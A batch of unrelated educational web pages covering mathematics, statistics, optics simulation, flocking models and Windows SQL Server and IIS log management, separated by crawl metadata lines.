Aside from the context of free energy computation, the exact same reason implied by the previous metaphor suggests that the gradient-based method is often more an alternative dual approach to the zero order method:
- In survival analysis, the Nelson–Aalen estimator is sort of the gradient version of of the Kaplan–Meier estimator (product limit).
- In optimization, finding the mode of convext function is equivalent to finding the minimin the abs(gradient) function.
- In cross-validation, the jackknife is the gradient-alternative to importance sampling.
- In optimization convergence test, we can either monitor if the objective is stable, or if the gradient becomes zero.
- In MCMC convergence test, we can either monitor if the sample draws have mixed, or if the gradient of the log density has mean zero.
Should we compute more gradients? | <urn:uuid:55d5487e-c192-4167-ac84-d04fd333ddcc> | CC-MAIN-2023-14 | https://www.yulingyao.com/blog/2021/gradient/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945368.6/warc/CC-MAIN-20230325161021-20230325191021-00012.warc.gz | en | 0.90608 | 568 | 2.53125 | 3 |
Definition:Transversal (Group Theory)/Right Transversal
< Definition:Transversal (Group Theory)(Redirected from Definition:Right Transversal)Jump to navigation Jump to search
Let $G$ be a group.
Let $H$ be a subgroup of $G$.
Let $S \subseteq G$ be a subset of $G$.
$S$ is a right transversal for $H$ in $G$ if and only if every right coset of $H$ contains exactly one element of $S$.
Also known as
A right transversal is also known as a set of right coset representatives.
- 1965: J.A. Green: Sets and Groups ... (previous) ... (next): $\S 6.3$. Index. Transversals
- 1982: P.M. Cohn: Algebra Volume 1 (2nd ed.) ... (previous) ... (next): $\S 3.3$: Group actions and coset decompositions
- 1989: Ephraim J. Borowski and Jonathan M. Borwein: Dictionary of Mathematics ... (previous) ... (next): transversal: 2. | <urn:uuid:6e0ca132-089d-4dbb-906e-50d52eaf4bbd> | CC-MAIN-2023-14 | https://www.proofwiki.org/wiki/Definition:Right_Transversal | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949701.56/warc/CC-MAIN-20230401063607-20230401093607-00012.warc.gz | en | 0.671727 | 261 | 2.875 | 3 |
Cavalieri's principle should not be confused with Cavalieri's quadrature formula.
In geometry, Cavalieri's principle, a modern implementation of the method of indivisibles, named after Bonaventura Cavalieri, is as follows:
Today Cavalieri's principle is seen as an early step towards integral calculus, and while it is used in some forms, such as its generalization in Fubini's theorem, results using Cavalieri's principle can often be shown more directly via integration. In the other direction, Cavalieri's principle grew out of the ancient Greek method of exhaustion, which used limits but did not use infinitesimals.
Cavalieri's principle was originally called the method of indivisibles, the name it was known by in Renaissance Europe. Cavalieri developed a complete theory of indivisibles, elaborated in his Geometria indivisibilibus continuorum nova quadam ratione promota (Geometry, advanced in a new way by the indivisibles of the continua, 1635) and his Exercitationes geometricae sex (Six geometrical exercises, 1647). While Cavalieri's work established the principle, in his publications he denied that the continuum was composed of indivisibles in an effort to avoid the associated paradoxes and religious controversies, and he did not use it to find previously unknown results.
In the 3rd century BC, Archimedes, using a method resembling Cavalieri's principle, was able to find the volume of a sphere given the volumes of a cone and cylinder in his work The Method of Mechanical Theorems. In the 5th century AD, Zu Chongzhi and his son Zu Gengzhi established a similar method to find a sphere's volume. The transition from Cavalieri's indivisibles to Evangelista Torricelli's and John Wallis's infinitesimals was a major advance in the history of calculus. The indivisibles were entities of codimension 1, so that a plane figure was thought as made out of an infinite number of 1-dimensional lines. Meanwhile, infinitesimals were entities of the same dimension as the figure they make up; thus, a plane figure would be made out of "parallelograms" of infinitesimal width. Applying the formula for the sum of an arithmetic progression, Wallis computed the area of a triangle by partitioning it into infinitesimal parallelograms of width 1/∞.
N. Reed has shown how to find the area bounded by a cycloid by using Cavalieri's principle. A circle of radius r can roll in a clockwise direction upon a line below it, or in a counterclockwise direction upon a line above it. A point on the circle thereby traces out two cycloids. When the circle has rolled any particular distance, the angle through which it would have turned clockwise and that through which it would have turned counterclockwise are the same. The two points tracing the cycloids are therefore at equal heights. The line through them is therefore horizontal (i.e. parallel to the two lines on which the circle rolls). Consequently each horizontal cross-section of the circle has the same length as the corresponding horizontal cross-section of the region bounded by the two arcs of cyloids. By Cavalieri's principle, the circle therefore has the same area as that region.
Consider the rectangle bounding a single cycloid arch. From the definition of a cycloid, it has width and height, so its area is four times the area of the circle. Calculate the area within this rectangle that lies above the cycloid arch by bisecting the rectangle at the midpoint where the arch meets the rectangle, rotate one piece by 180° and overlay the other half of the rectangle with it. The new rectangle, of area twice that of the circle, consists of the "lens" region between two cycloids, whose area was calculated above to be the same as that of the circle, and the two regions that formed the region above the cycloid arch in the original rectangle. Thus, the area bounded by a rectangle above a single complete arch of the cycloid has area equal to the area of the circle, and so, the area bounded by the arch is three times the area of the circle.
The fact that the volume of any pyramid, regardless of the shape of the base, whether circular as in the case of a cone, or square as in the case of the Egyptian pyramids, or any other shape, is (1/3) × base × height, can be established by Cavalieri's principle if one knows only that it is true in one case. One may initially establish it in a single case by partitioning the interior of a triangular prism into three pyramidal components of equal volumes. One may show the equality of those three volumes by means of Cavalieri's principle.
In fact, Cavalieri's principle or similar infinitesimal argument is necessary to compute the volume of cones and even pyramids, which is essentially the content of Hilbert's third problem – polyhedral pyramids and cones cannot be cut and rearranged into a standard shape, and instead must be compared by infinite (infinitesimal) means. The ancient Greeks used various precursor techniques such as Archimedes's mechanical arguments or method of exhaustion to compute these volumes.
Consider a cylinder of radius
For every height
Therefore, the volume of the flipped paraboloid is equal to the volume of the cylinder part outside the inscribed paraboloid. In other words, the volume of the paraboloid is , half the volume of its circumscribing cylinder.
If one knows that the volume of a cone is , then one can use Cavalieri's principle to derive the fact that the volume of a sphere is , where
That is done as follows: Consider a sphere of radius
base x height=\pir2 ⋅ r=\pir3
("Base" is in units of area; "height" is in units of distance. .)
Therefore the volume of the upper half-sphere is and that of the whole sphere is .
See main article: Napkin ring problem.
In what is called the napkin ring problem, one shows by Cavalieri's principle that when a hole is drilled straight through the centre of a sphere where the remaining band has height h, the volume of the remaining material surprisingly does not depend on the size of the sphere. The cross-section of the remaining ring is a plane annulus, whose area is the difference between the areas of two circles. By the Pythagorean theorem, the area of one of the two circles is π times r 2 - y 2, where r is the sphere's radius and y is the distance from the plane of the equator to the cutting plane, and that of the other is π times r 2 - (h/2)2. When these are subtracted, the r 2 cancels; hence the lack of dependence of the bottom-line answer upon r. | <urn:uuid:3d5ba6aa-511d-4a0d-b6ed-2b41af7d659f> | CC-MAIN-2023-14 | https://everything.explained.today/Cavalieri%27s_principle/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945144.17/warc/CC-MAIN-20230323100829-20230323130829-00612.warc.gz | en | 0.942602 | 1,589 | 4 | 4 |
Two Methods for Making a Statistical Decision Section
Of the two methods for making a statistical decision, the p-value approach is more commonly used and provided in published literature. However, understanding the rejection region approach can go a long way in one's understanding of the p-value method. In the video, we show how the two methods are related. Regardless of the method applied, the conclusions from the two approaches are exactly the same.
Video: The Rejection Region vs the P-Value Approach
Comparing the Two Approaches Section
Both approaches will ensure the same conclusion and either one will work. However, using the p-value approach has the following advantages:
- Using the rejection region approach, you need to check the table or software for the critical value every time you use a different \(\alpha \) value.
- In addition to just using it to reject or not reject \(H_0 \) by comparing p-value to \(\alpha \) value, the p-value also gives us some idea of the strength of the evidence against \(H_0 \). | <urn:uuid:9816c101-24c0-4c24-80bd-603b4f820625> | CC-MAIN-2023-14 | https://online.stat.psu.edu/stat500/lesson/6a/6a.4/6a.4.2 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948684.19/warc/CC-MAIN-20230327185741-20230327215741-00212.warc.gz | en | 0.890488 | 220 | 2.84375 | 3 |
Investigating the Penrose Unilluminable Room with Ray Optics
An interesting question was raised in the 1950s by the mathematician Ernst Straus: In an arbitrarily shaped empty room with side walls made of perfect mirrors, will a point light source always illuminate the whole room? This question was answered elegantly by the Nobel laureate Sir Roger Penrose, who designed a room with unilluminable areas that is thus termed “the Penrose unilluminable room”. However, is the Penrose unilluminable room really unilluminable? Using the COMSOL Multiphysics® software to generate simulations, we will see if this is the case and discuss the fundamental assumption of ray optics.
The Illumination Problem
When you hear the question for the first time, it might not be immediately clear what exactly it is asking. Let’s consider the example shown in the figure below. As shown on the left, the mirrored side wall of a 2D room can take an arbitrary shape, and the light source can be placed in any location within the room. In this particular case, it’s easy to imagine that the whole room will be illuminated by the light source, which is unsurprisingly confirmed by the ray tracing simulation on the right. Essentially, Straus’ question is whether there exists a design of the shape of the room such that, when a point light source is placed inside, certain areas are not illuminated.
An empty room with arbitrarily shaped side walls made of perfect mirrors and a point light source inside the room (left). A ray tracing simulation showing that the entire room is illuminated by the point light source (right).
Upon seeing the problem, I immediately thought that perhaps a room with very sharp corners could prevent certain areas from being illuminated. You have probably already guessed it, however: If it were this easy to figure out the shape of an unilluminable room, it wouldn’t have been an interesting question for the science community. We can see that, given sufficient time, the light will always illuminate the whole room. At this point, you might not be convinced and think you can design an unilluminable room. If you are up to the challenge, please feel free to use the Ray Optics Module to give it a try!
A room with sharp corners fully illuminated by a point light source.
The Penrose Unilluminable Room
This tricky problem was ultimately tackled by the brilliant Roger Penrose, winner of the 2020 Nobel Prize in Physics. His design, shown in the figure below, is not obvious at all at first glance. The room consists of two elliptical walls on the top and bottom and a rectangular area with two “umbrella” cutouts. The only requirements for the design to work are that the top and bottom walls are described as an ellipse x^2/a^2+y^2/b^2=1 and that the focal points of the ellipse coincide with the corner points of the “umbrellas”. Details such as the specific values of a and b, the shape of the umbrella, the width of the umbrella, and so on won’t change the property of the room.
The design of the Penrose unilluminable room.
Let’s use the Ray Optics Module to see if it works! In the animations below, we placed the point light source at some representative points — in the center, in the top half, and to the left of the left-hand umbrella (“underneath” the umbrella, if we imagined it were upright). Light rays are launched from the point isotropically. Clearly, in every case, there are areas not illuminated by the light. When the light source is placed “underneath” the umbrella, the light doesn’t even travel to the lower half of the room. Note that this is not because the time-domain simulation has not been run for long enough. Even when time approaches infinity, these shadow areas remain unilluminated.
Ray tracing simulations with the point light source placed in different locations of the Penrose unilluminable room. In all cases, there always exist areas not illuminated.
The special characteristics of the Penrose unilluminable room come from the special properties of the elliptical mirror. You may recall from your college optics class that light originating from one focal point of an elliptical mirror will be focused on the other focal point. This property is demonstrated by the animation below on the left. The other lesser known property of an elliptical mirror is that when the light originates between a focal point and the closest apex of the ellipse, it will only arrive at a point between the other focal point and the other apex, never intersecting the long axis between the focal points. This property is demonstrated by the animation in the middle below. In addition, light originating between the two focal points will never intersect the long axis between each focal point and its closest apex, as demonstrated by the animation on the right.
Left: Light rays launched at a focal point will only intersect the long axis at the focal points. Middle: Light rays launched between a focal point and the closest apex will not intersect the long axis between the focal points. Right: Light rays launched between two focal points will only intersect the long axis between the focal points.
With these properties in mind, we can divide the Penrose unilluminable room into the regions shown below. It’s important to note again that in Penrose’s design, the focal points of the ellipse coincide with the edges of the umbrellas. As such, we know that:
- A light source placed inside A_1 will only illuminate A_1, B_1, and A_2 because it can never intersect the long axis of the ellipse between the focal points and enter the C_1 area.
- A light source placed in B_1 will leave A_3 and A_4 unilluminated because the light rays can only enter the lower half of the room between the two focal points of the lower ellipse. Thus, they can never intersect the long axis between the focal points and apexes and enter A_3 and A_4.
- A light source placed in C_1 will leave A_1, A_2, A_3, and A_4 unilluminated for the same reason.
Due to the symmetry, the same effects will occur for a light source placed in the corresponding regions of the lower half of the room. Therefore, we can conclude that the Penrose unilluminable room will always have unilluminated areas no matter where the point light source is placed within the room.
Dividing the room into different regions. A light source placed inside A_1 will only illuminate A_1, B_1, and A_2. A light source placed in B_1 will leave A_3 and A_4 unilluminated. A light source placed in C_1 will leave A_1, A_2, A_3, and A_4 unilluminated.
Let There Be Light: Illuminate the Unilluminable Area
The ray tracing simulations above seem to show convincing results that confirm the room being unilluminable, but is it really? We need to remember the fundamental assumption of ray optics: that the wavelength of the light is much smaller than the size of the object that the light interacts with, so that the diffraction effect can be totally ignored. Recall a is the long axis of the ellipse that describes the top and bottom walls of the room. The ray optics simulation essentially assumes the wavelength 𝜆<<𝑎 . If we have a real life room whose dimension is in the order of meters and a light source in the visible spectral range (~500 nm wavelength), this assumption holds up very well. But what if we shrink the room or increase the wavelength of the light such that \lambda is comparable to a?
To test this, we switch to the Wave Optics Module to perform full wave simulations. A point Line Current (Out-of-Plane) is placed “underneath” the umbrella in the top left corner (in the A_1 region), similar to the third ray tracing animation of the room shown above. The Line Current functions as a point source that emits a cylindrical wave with the electric field pointing in the out-of-plane direction. The field distributions at increasing wavelengths are simulated in the frequency domain and shown below. At \lambda=a/40 (top left), the field distribution is similar to the ray tracing simulation, as expected. The field does not seem to penetrate the lower half of the room. However, as the wavelength gets longer, diffraction becomes more prominent, such that the field leaks into the lower half of the room. At \lambda=a/10 (bottom left) and \lambda=a/5 (bottom right), it’s very clear that the previously unilluminated area is illuminated!
Simulated field distributions in the frequency domain at \lambda=a/40, \lambda=a/20, \lambda=a/10, and \lambda=a/5. At shorter wavelengths, the field distribution resembles the ray tracing result. However, at longer wavelengths, the field penetrates into the area that was previously not illuminated due to diffraction. The norm of the electric field is plotted in these figures.
In addition to using the Electromagnetic Waves, Frequency Domain interface to visualize the field distribution at equilibrium, running a time-domain simulation using the Electromagnetic Wave, Transient interface can help to visualize the wave propagation and diffraction.
Out-of-plane electric field emitted by a Line Current located in the top half of the room “underneath” (to the left of) the left-hand umbrella and simulated in the time domain. Due to diffraction, the field leaks into the lower half of the room. The wavelength is a/5.
So far, our simulations seem to suggest that the Penrose unilluminable room is only unilluminable under the assumption that the diffraction effect can be totally ignored. However, we must realize that we can’t jump to this conclusion so quickly. The situation is actually more complicated. When the wave nature of the light emerges, another important phenomenon — interference — needs to be taken into account. By looking at the frequency-domain simulation results, we can see that in many areas, the norm of the electric field is in fact zero. This is because the outgoing wave and the diffracted wave interfere and form a standing wave pattern with nodes of zero field intensity. Therefore, in a sense, those areas are not illuminated at equilibrium. There will always be areas with no light if we wait long enough. On the other hand, we can think about it in the time domain. When the light wave propagates into these areas for the first time, they are illuminated for a period of time, until the diffracted wave arrives to cancel the electric field. In this sense, the whole room is illuminated, at least for certain period of time. In conclusion, whether the whole room is unilluminated or not depends on your interpretation. Most importantly, we can see that, at different scales, an optical phenomenon can look drastically different. As simulation practitioners, we always need to keep in mind the fundamental difference between wave optics and ray optics, as well as the unique phenomena associated with them.
Besides the fact that this mathematical brainteaser is interesting, the Penrose unilluminable room is an excellent example to demonstrate the fundamental difference between wave optics and ray optics. Under different assumptions, the conclusion to the same question can be totally different. It also answers a question that we get a lot from beginners: The COMSOL® software has two optics modules. Which one, the Wave Optics Module or the Ray Optics Module, should I use to simulate my optics problem? The short answer is: If we are concerned with geometries whose size is orders of magnitude larger than the relevant wavelength, e.g., visible light interacting with camera lens systems or lidar operating on the street, using the Ray Optics Module is perfectly fine. On the other hand, if we are interested in light scattering of nanoparticles whose size is smaller or comparable to the wavelength, full wave simulation with the Wave Optics Module or the RF Module is inevitable. At the same time, the choice of the module also depends on which physical quantities and processes you are interested in. For example, ray optics simulation yields light propagation paths while wave optics simulation can render the full electric field distribution.
Choosing the appropriate module for your simulation not only ensures the accuracy of your simulation result but also can save you a tremendous amount of simulation time.
Try the Penrose Unilluminable Room model yourself by clicking the button below, which will take you to the Application Gallery entry:
- Want to learn more about this illumination problem? Check out these videos, which discuss the Penrose unilluminable room in depth using animations, drawings, and a 3D printer:
- COMSOL Now
- Fluid & Heat
- Structural & Acoustics
- Today in Science | <urn:uuid:9eab3d3f-eaba-4ba1-b466-3866881df04c> | CC-MAIN-2023-14 | https://www.comsol.com/blogs/investigating-the-penrose-unilluminable-room-with-ray-optics/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946637.95/warc/CC-MAIN-20230327025922-20230327055922-00213.warc.gz | en | 0.923024 | 2,790 | 3.40625 | 3 |
How Much Can We Spend? printable worksheet
A country has decided to have just two different coins.
It has been suggested that these should be 3z and 5z coins.
The shops think this is a good idea since most totals can be made.
|$2\times3z+1\times 5z=11z$||$7 \times 3z + 2 \times 5z = 31z$|
Unfortunately some totals can't be made, for example 4z.
Which totals can be made?
Is there a largest total that cannot be made?
How do you know?
They have decided that they will definitely have 3z coins but can't make up their minds about the other coin.
Can you find a relationship between 3z, the second coin, and the totals that can and can't be made?
In other countries they have also decided to have just two coins, but instead of the 3z coins they have chosen a different prime number.
Can you find a relationship between pairs of coin values and the totals that can and can't be made with them? | <urn:uuid:02479e81-bcbd-4a18-b6eb-c828970dbe9e> | CC-MAIN-2023-14 | https://nrich.maths.org/6650 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950030.57/warc/CC-MAIN-20230401125552-20230401155552-00413.warc.gz | en | 0.96925 | 230 | 2.65625 | 3 |
by Dirk Brockmann
This explorable illustrates one of the most famous and most fundamental models for the emergence of flocking, swarming and synchronized behavior in animal groups. The model was originally published in a 1995 paper by Tamás Vicsek and co-workers and is therefore called the Vicsek-Model. The model can explain why transitions to flocking behavior in groups of animals are often not gradual. Instead, one can expect a sudden emergence of flocking and synchronized movements if a critical density is crossed.
Press Play and keep on reading….
This is how it works
In the model a group of $N$ particles move around in space, a square arena with periodic boundary conditions (when particles hit one of the walls, they reenter on the other side, like ghosts). The particles move at a constant speed $v$ which is the same for all particles (you can change it with the speed slider).
However, the particles change the heading $\theta$ as time goes on. There are two factors that shape how particles change their heading:
- A random force that makes them wiggle around
- An alignment force that nudges a particle to align with others around it
So, given that the heading of each particle $n$ at time $t$ is denoted by $\theta_ n (t)$, the random force changes the heading in a time interval $\Delta t$ like so:
$$ \theta_n (t+\Delta t) = \theta_n (t)+\eta_ n(t), $$
where $\eta_ n(t)$ is a random number with zero mean and some variance. You can change the magnitude of the random heading changes with the wiggle slider in the control panel.
The alignment force works like this: At every time step a particle evaluates the mean heading $\left < \theta(t) \right > _n$ of all other particles around it in an interaction radius $R$ and aligns its own heading to match this mean heading. So with this and the wiggle the complete update of the heading is given by:
$$ \theta_n (t+\Delta t) = \left< \theta(t) \right>_ n +\eta_ n(t). $$
The size of the interaction radius can be adjusted with the interaction radius slider.
You can now explore under which conditions all particles will equilibrate to a state where the whole flock will eventually move into one direction (approximately). For a large flock, it helps increasing the speed of the particles with the speed slider.
The optional color by heading toggle paints the particles according to their heading.
You may want to check out the explorables “Flock’n Roll”, “Into the Dark”, and “Thrilling Milling Schelling Herings”, all of which implement a model for collective behavior and swarming, very similar (but slightly more complicated) to the Vicsek-Model. Also the model for pedestrian dynamics in explorable “The Walking Head”, is quite similar to the Vicsek-Model.
- Tamás Vicsek, András Czirók, Eshel Ben-Jacob, Inon Cohen, and Ofer Shochet, “Novel Type of Phase Transition in a System of Self-Driven Particles”, Phys. Rev. Lett. 75, 1226 – Published 7 August 1995 | <urn:uuid:fc5b4396-e833-4ddd-881c-0661d51ad1e4> | CC-MAIN-2023-14 | https://www.complexity-explorables.org/explorables/horde-of-the-flies/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950363.89/warc/CC-MAIN-20230401221921-20230402011921-00013.warc.gz | en | 0.86835 | 743 | 3.578125 | 4 |
In our first two Windows Logging guides, we explored basic and advanced concepts for general Windows logging. In this article, we will hone in on logs for two of the most common Windows Server applications:
- Microsoft SQL Server—Microsoft’s relational database management system (RDBMS).
- Internet Information Services (IIS)—Microsoft’s popular Windows web server application.
Both of these apps are staples in Windows ecosystems. Understanding how their logs work can make you a more efficient administrator. Let’s start with Microsoft SQL Server.
Microsoft SQL Server logs
Microsoft’s popular RDBMS creates multiple logs and provides administrators with several ways to access those logs. We’ll focus on using SQL Server Management Studio (SSMS) to access and interact with key SQL Server logs.
SQL Server Transaction Log
The transaction log sequentially records the modifications and transactions that occur on a SQL Server instance. This log is a crucial part of database transaction recovery, database restoration, high availability, and disaster recovery for SQL Server.
The transaction log consists of smaller virtual log files (VLFs) in a larger, logical log file. It uses a circular approach in which VLFs are eventually overwritten. To understand how this circular process works, it’s important to become familiar with the following concepts:
- Log Sequence Number (LSN)—The LSN is a unique number that identifies a record in the transaction log. An individual LSN record contains granular information on transactions, such as the
Log Record Length,
Page ID, and
- MinLSN—The oldest LSN required for a complete database recovery.
- Truncation—The transaction log truncation process removes unnecessary VLFs to free space in the logical file. Depending on the SQL Server’s recovery model, truncation may occur after a checkpoint or backup.
Now, back to that circular process. As transactions occur, they are recorded in the VLFs with a unique LSN. After backups or checkpoints, unneeded log files are truncated. The transaction log continues to append to the VLFs until it reaches the end of the logical log, then it repeats with the first VLF. If truncation occurs normally and the MinLSN remains untruncated, the transaction log can successfully support full database recoveries without the file growing too large or impacting performance.
SQL Server Transaction Log Location
By default, transaction logs are located in the same directory as the data files for a database (such as
C:\Program Files\Microsoft SQL Server\MSSQL16.SQLEXPRESS\MSSQL\DATA\ on modern Windows operating systems) and use the
.ldf (log database file) format and file extension. You can check the location of the transaction log with this command:
USE database_name; GO SELECT name, physical_name FROM sys.database_files WHERE type = 1; GO
How To Read SQL Server Transaction Log Files
.ldf files, you can use third-party tools (sometimes called “SQL transaction readers” or similar) or the unofficial (but popular)
fn_dblog command. For example, to read all the transaction log entries for
database_name, you can use this command:
USE database_name; GO SELECT * FROM sys.fn_dblog(NULL, NULL); GO
SQL Server Error Log
The SQL Server error log is simpler than the transaction log. As an administrator, you’ll more likely need to read and analyze the error log than the transaction log for troubleshooting. If the system isn’t working properly and you’re looking for clues, this log is a good place to start.
SQL Server Error Log Location
By default, the SQL Server error log is located at
%ProgramFiles%\Microsoft SQL Server\SQL_version\MSSQL\Log.
A new plaintext
ERRORLOG file is created when the SQL Server service starts. Older logs have a number appended to them, and a higher number implies an older log (for example,
ERRORLOG.2 is older than
How To Read the SQL Server Error Log
Because the SQL Server error log is a plaintext file, you can read it with a text editor like Notepad or Notepad++.
You can also use SSMS to view the log to better visualize and filter the data. To use SSMS to view the error log, follow these steps:
1. Launch Object Explorer with the F8 key or click View → Object Explorer.
2. Expand the Management folder.
3. Expand the SQL Server Logs folder.
4. Double-click the desired log. The current log includes the word “Current” at the beginning of the name by default.
5. Now you can view, filter, and export the log data.
The fields in the error log are:
- Date—A date and timestamp for the log record
- Source—The source of a log message. This is often a specific SPID or the server itself.
- Message—The log message content.
- Type—The type of log. For basic configurations, this will usually be
- Log Source—Which log file contains the record. This field is useful if you view multiple logs at once in SSMS.
Tips for Managing SQL Server Log Size
Both performance and logs are important aspects of maintaining a SQL Server. Unfortunately, logs can impede server performance at times. Usually, when logs become a problem, it’s because they’ve grown too large. However, if the transaction log is too small to keep up with database queries, this can be a problem, too.
Striking a balance between log storage and performance can help you get the most out of your SQL Server deployment.
Here are some tips for managing SQL Server log size to help you get it right:
- Don’t set the transaction log
FILEGROWTHparameter above 1,024 MB. Beginning with SQL Server 2016, the default
FILEGROWTHparameter for the transaction log is 64 MB. Microsoft recommends against changing the parameter above 1,024 MB. Additionally, starting in SQL Server 2022 (16.x) instant file initialization (IFI) can benefit transaction log autogrowth events of up to 64 MB.
- Use the
DBCC SHRINKFILETransact-SQL (T-SQL) command to reduce VLF space. The
TRUNCATEONLYparameter can remove inactive VLFs to free up space on your system.
- Set reasonable max error log sizes. A cap on the size and quantity of SQL Server error logs can help you save space on your system. To set a max file size and number of error logs in SCCM, follow these steps:
1. Launch Object Explorer with the F8 key or click View → Object Explorer.
2. Expand the Management folder.
3. Right-click the SQL Server Logs folder and click Configure.
4. Input values for the maximum number of error log files and the maximum size of an error log file (in KB), then click OK.
5. The changes will take effect the next time your SQL Server instance restarts.
IIS Server Logs
In the *nix world, nginx and Apache are two of the most popular web server applications. In Windows environments, IIS is often the go-to web server application. IIS records logs that are comparable to nginx and Apache’s error and access logs. In this section, we’ll look at important IIS logs and how you can modify them.
We’ll use the IIS Manager in some of our examples below. We recommend installing it if you want to follow along.
Where To Find IIS Server Logs
Nginx and Apache logs are generally in subdirectories of
/var/log/ by default. For IIS, the default location is
%SystemDrive%\inetpub\logs\LogFiles. For most systems, that means the files will be in subdirectories at
C:\inetpub\logs\LogFiles, and each of your sites will have a folder in that subdirectory.
How To Read IIS Server Logs
IIS log files are plaintext files that you can read with a text editor like Notepad or Notepad++.
The default fields in an IIS server log are described in the table below.
IIS Server Log Fields
|date||The date the log record was created.||2023-11-11|
|time||The time the log record was created in HH:MM:SS format.||11:11:59|
|s-ip||The “server IP” where the log record was created.||198.51.100.11|
|cs-method||The type of request (for example, the associated HTTP verb).||GET|
|cs-uri-stem||The URI the client requested.||/recipes/breakfast/pepperandegg.html|
|cs-uri-query||The query associated with the request (only relevant for dynamic pages).||param1=egg¶m2=giardiniera|
|s-port||The server port that the request was made on.||80|
|cs-username||Username associated with an authenticated request or a - character if the request is unauthenticated.||webuser123|
|c-ip||The “client IP” of the client making the request.||192.0.2.11|
|cs(User-Agent)||The client’s user agent.||Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/188.8.131.52+Safari/537.36+Edg/108.0.1462.54|
|cs(Referer)||The site that referred the user or a - if no relevant data available.||http://www.example.com/bestbreakfast.html|
|sc-status||The HTTP status code associated with the request.||200|
|sc-substatus||The substatus code associated with the request.||0|
|sc-win32-status||The Windows status code associated with the request.||0|
|time-taken||How long the request took in milliseconds.||210|
How To Change IIS Log File Settings
The default fields in the IIS logs are not your only options. You can customize IIS logs to meet specific requirements. You can use the IIS manager to modify IIS log settings by following these steps:
1. Launch IIS Manager.
2. Select Sites → <Your Website>.
3. Double-click the Logging icon.
4. Make and apply your changes.
We’ll review the different modifications you can make in the sections below.
IIS Log File Settings
- Format—W3C logging is the default formatting. You can modify the fields in the W3C format using the Select Fields button. You can change the format to IIS or NCSA, both of which are fixed formats (which means you cannot modify fields). If W3C, IIS, or NCSA formats don’t meet your needs, consider Custom Logging for older IIS versions or Enhanced Logging for newer IIS versions.
- Directory—The directory to store your IIS log files. In addition to specifying a local directory, you can send the logs to a remote server using UNC paths (for example,
- Encoding—The encoding used for IIS log files.
IIS Log Event Destination
In addition to the IIS log file, newer versions of IIS support Event Tracing for Windows (ETW). This section allows you to configure IIS to write to its log files only, ETW only, or both.
IIS Log File Rollover
The IIS Log File Rollover settings define how IIS handles log rollover. You can schedule the log files to roll over at a given time interval (
Monthly), based on file size, or not create new log files at all. If you want to optimize IIS log file storage, check out Microsoft’s Managing IIS Log File Storage article, which includes scripts for deleting old logs and covers enabling folder compression.
Log Everything, Answer Anything – For Free
Falcon LogScale Community Edition (previously Humio) offers a free modern log management platform for the cloud. Leverage streaming data ingestion to achieve instant visibility across distributed systems and prevent and resolve incidents.
Falcon LogScale Community Edition, available instantly at no cost, includes the following:
- Ingest up to 16GB per day
- 7-day retention
- No credit card required
- Ongoing access with no trial period
- Index-free logging, real-time alerts and live dashboards
- Access our marketplace and packages, including guides to build new packages
- Learn and collaborate with an active community | <urn:uuid:c5ca008a-3cb0-48fc-91e4-dca1fe47373c> | CC-MAIN-2023-14 | https://www.crowdstrike.com/guides/windows-logging/iis-and-sql-server-logging/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943637.3/warc/CC-MAIN-20230321064400-20230321094400-00413.warc.gz | en | 0.79207 | 2,831 | 3.046875 | 3 |
Suppose $A$ and $B$ are two objects whose definition is in terms of a given set of properties.
If it can be demonstrated that, in order for both $A$ and $B$ to fulfil those properties, it is necessary for $A$ to be equal to $B$, then $A$ (and indeed $B$) is unique.
Equivalently, there is one and only one, or exactly one, such object.
Thus, intuitively, an object is unique if there is precisely one such object.
Unique Existential Quantifier
In the language of predicate logic, uniqueness can be defined as follows:
Let $\map P x$ be a propositional function and let $x$ and $y$ be objects.
The symbol $\exists !$ denotes the existence of a unique object fulfilling a particular condition.
- $\exists ! x: \map P x$
- There exists exactly one object $x$ such that $\map P x$ holds
- There exists one and only one $x$ such that $\map P x$ holds.
This quantifier is called the unique existential quantifier.
Also known as
Uniqueness can also be defined as:
- An object $x$ is unique (in a given context) if and only if:
- there exists at most one $x$
- there exists at least one $x$.
Thus the phrase at most and at least one can occasionally be seen to mean unique.
Such a definition can be a useful technique for proving uniqueness.
- 1946: Alfred Tarski: Introduction to Logic and to the Methodology of Deductive Sciences (2nd ed.): $\S 4.26$
- 1971: Gaisi Takeuti and Wilson M. Zaring: Introduction to Axiomatic Set Theory: $\S 6.10$ | <urn:uuid:9c81e7b4-1fae-4bdf-86a8-35003103d9f5> | CC-MAIN-2023-14 | https://proofwiki.org/wiki/Definition:Exactly_One | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946637.95/warc/CC-MAIN-20230327025922-20230327055922-00214.warc.gz | en | 0.832668 | 409 | 3.890625 | 4 |
Elementary excitation in the quantum mechanical treatment of vibrations in a crystal lattice. An energy bundle that behaves as a particle of energy \(h\ \nu \), with \(\nu \) the vibration frequency and \(h\) the @[email protected]
- A phonon can be considered as an acoustic @[email protected] of thermal vibration of a crystal lattice (or liquid helium II).
- Every harmonic vibration can be decomposed in phonons, which are the elementary vibrations. The total number of phonons in a system that has internal vibrations (e.g., a crystal) is related to the temperature of the system.
- The concept of phonons provides a simplification in the theories of thermal and electrical conduction in solids.
- For example, interactions between phonons and electrons are thought to be responsible for such phenomena as 'superconductivity'. | <urn:uuid:00425c10-fb4b-40ae-a850-db93c6c2e44c> | CC-MAIN-2023-14 | https://goldbook.iupac.org/terms/view/P04547 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949035.66/warc/CC-MAIN-20230329213541-20230330003541-00414.warc.gz | en | 0.874277 | 201 | 3.1875 | 3 |
Today, we are surrounded by data everywhere. Data has become easily accessible. So, the challenge that arises out of it is how to make the most of the available data! The first step towards using such vast amounts of data is finding the right data integration tool that could help you to study, analyse and manage dynamically different data from numerous sources. However, the bigger challenge before using the data is data extraction.
Therefore, now we are going to see in details what exactly this extraction of data is, what tools are available for the same and what role it plays in integrating data.
What is data extraction?
